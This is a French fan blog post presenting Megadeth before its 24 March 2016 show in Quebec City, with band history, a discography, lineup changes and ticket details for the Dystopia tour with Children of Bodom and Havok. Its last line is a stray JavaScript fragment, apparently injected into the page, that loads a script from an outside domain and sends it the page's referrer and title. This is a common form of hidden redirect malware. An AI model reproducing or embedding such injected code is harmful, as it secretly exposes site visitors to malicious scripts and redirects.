Bonjour à vous tous chers amis !

Aujourd’hui, nous vous présentons un autre article spécial sur un groupe qui sera de passage à Québec très bientôt. Le groupe en question est Megadeth. Dans cet article, nous allons garder la même recette qu’à l’habitude. Autrement dit, nous vous parlerons rapidement du groupe en général et nous allons essayer de vous donner le plus d’informations possible sur la tournée qui s’amènera à Québec jeudi le 24 mars prochain. Que tu aimes ou non Megadeth, tu te dois de lire ce qui suit. Qui sait, tu vas peut-être changer d’idée. Allons-y sans plus tarder!

Le groupe : Même si le nom ne vous dit rien, il est pratiquement sûr que vous avez déjà entendu au moins une des compositions crées par ce band. Du même fait, le groupe ne date pas d’hier, car c’est en 1983 qu’il a vu le jour, en Californie. Il a été formé par Dave Mustaine et David Ellefson. Dave a décidé de créer le band suite à son renvoi de son précédant groupe Metallica. Son but premier, en créant Megadeth, était de faire de l’ombre à son ancien band, en guise de vengeance. C’est en 1985, que le band enregistra son tout premier album intitulé ‘’Killing Is My Business…and Business Is Good!.’’. La moitié de l’argent qui était allouée à la production de l’album a été utilisée par le groupe pour s’acheter de la drogue, ce qui a mit en rogne leur producteur qui a même quitté le band.
C’est en 1990 que l’album phare, et le meilleur selon plusieurs fans, est sorti. Cet album se nomme ‘’Rust in Peace’’. Son excellente qualité et la pertinence de l’album tient surtout du fait que pour une des première fois depuis le début du band, tous les musiciens étaient sobres.

En 2002, Dave Mustaine fût conduit à l’hôpital pour des problèmes rénaux. Peu après son hospitalisation, quand il fût rendu au Texas pour faire faire un bilan de santé approfondie, il fût diagnostiqué avec une neuropathie radiale du bras gauche. Cette lésion a été causée quand Dave c’est assoupi sur son bras, ce qui a mené a une compression du nerf radial. Suite à cette mauvaise nouvelle, il fût obligé d’arrêter de jouer de la guitare. C’est suite à cette annonce qu’il décida qu’il quittait Megadeth.

C’est en 2004 que Mustaine reforma le band pour enregistrer l’album ‘’The System Has Failed’’. Il fût un grand succès et les critiques l’ont bien accueillis en disant que c’était un excellent retour aux sources.

En 2005, Mustaine a inauguré la tournée Gigantour. La première édition comprenait des bands tels que Dream Theater, Nevermore, Anthrax, Fear Factory ainsi que Megadeth. Cette tournée annuelle qui a durée jusqu’en 2012, était un incontournable pour les amateurs de musique hard/rock métal.

J’ai passé par-dessus plusieurs albums du groupe car je voulais énumérer les faits saillants du band alors, voici la discographie complète du groupe :
– Killing Is My Business… and Business Is Good! (1985)
– Peace Sells…but Who’s Buying? (1986)
– So Far, So Good… So What! (1988)
– Rust in Peace (1990)
– Countdown to Extinction (1992)
– Youthanasia (1994)
– Cryptic Writings (1997)
– Risk (1999)
– The World Needs a Hero (2001)
– The System Has Failed (2004)
– United Abominations (2007)
– Endgame (2009)
– Th1rt3n (2011)
– Super Collider (2013)
– Dystopia (2016)

J’en ai pas parlé encore mais au fil du temps, il y a eu beaucoup beaucoup BEAUCOUP de changements de musiciens au sein du groupe. Certains sont partis à cause d’une consommation trop élevée de drogue, d’autres à cause d’une mauvaise entente avec Dave Mustaine, ou tout simplement car ils avaient d’autres projets en tête. Malgré ce fait, le groupe a toujours sortis de nouveaux albums qui ont rarement déçus les fans.
Pour vous démontrer l’impressionnant roulement qu’il y a eu dans le groupe, voici une liste des anciens membres et l’enlignement actuelle.
-> Anciens membres <-
Kerry King, guitariste de 1983 à 1984
Lee Rausch, batteur de 1983 à 1984
Gar Samuelson, batteur de 1984 à 1987
Chris Poland, guitariste de 1984 à 1987 et en 2004
Jay Reynold, guitariste en 1987
Chuck Behler, batteur de 1987 à 1989
Jeff Young, guitariste de 1987 à 1989
Nick Menza, batteur de 1989 à 1998
Marty Friedman, guitariste de 1990 à 1999
Jimmy DeGrasso, batteur de 1998 à 2002
Al Pitrelli, guitariste de 1999 à 2002
Glen Drover, guitariste de 2004 à 2008
James Macdonough, bassiste de 2004 à 2006
James LoMenzo, bassiste de 2006 à 2010
Shawn Drover, batteur de 2004 à 2014
Chris Broderick, guitariste et chanteur secondaire de 2008 à 2014

-> Enlignement Actuel <-
Dave Mustaine, chanteur et guitariste
Dave ellefson, bassiste et chanteur secondaire
Kiko Loureiro, guitariste
Chris Adler, batteur

Je vous ai démontré une infime partie de ce qu’est l’histoire de Megadeth. Nous pourrions en jaser des heures et des heures. Si jamais vous voulez en savoir plus, je vous invite à aller lire sur le band, car son histoire est vraiment intéressante.

La tournée ‘’Dystopia World Tour’’ :
C’est dans le cadre de la tournée ‘’Dystopia World Tour’’ que Megadeth s’amènera à Québec en mars. Nous n’avons pas encore vraiment d’informations importantes concernant cette tournée, mise à part qu’elle vise à promouvoir le dernier album ‘’Dystopia’’, qui a reçut d’excellentes critiques. Cette tournée nous amène également deux bon groupes métal qui feront un travail plus qu’excellent en termes de premières parties. Les deux groupes sont ‘’Children Of Bodom’’ et ‘’Havok’’. Tout amateur de musique métal tel qu’il soit, se doit d’être de cette soirée qui s’annonce forte en headbang. Gageons que plusieurs auront mal au cou le landemain.

Je vous redonne les informations à savoir pour ce spectacle :
Quand : jeudi le 24 mars 2016
 : Centre Vidéotron de Québec
Quelle heure : portes à 18:00 et spectacle à 19:00
Prix des billets : 55 à 75$ ou 300$ et plus pour forfait VIP
Tournée : Dystopia Tour
Groupes : Megadeth, Havok & Children of Bodom
Production: Evenko

Vous pouvez encore vous procurez des billets à l’adresse suivante : http://www.ticketmaster.ca/Centre-Videotron-tickets-Quebec/event/10004F84CC7352FF?lang=fr-ca&brand=amq&camefrom=CV_direct

C’est la dessus qu’on se dit à la prochaine !
Passez une excellente journée et si jamais vous allez à ce spectacle, et bien passez une excellente soirée.

Rock On !

Christopher Drouin !

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + »;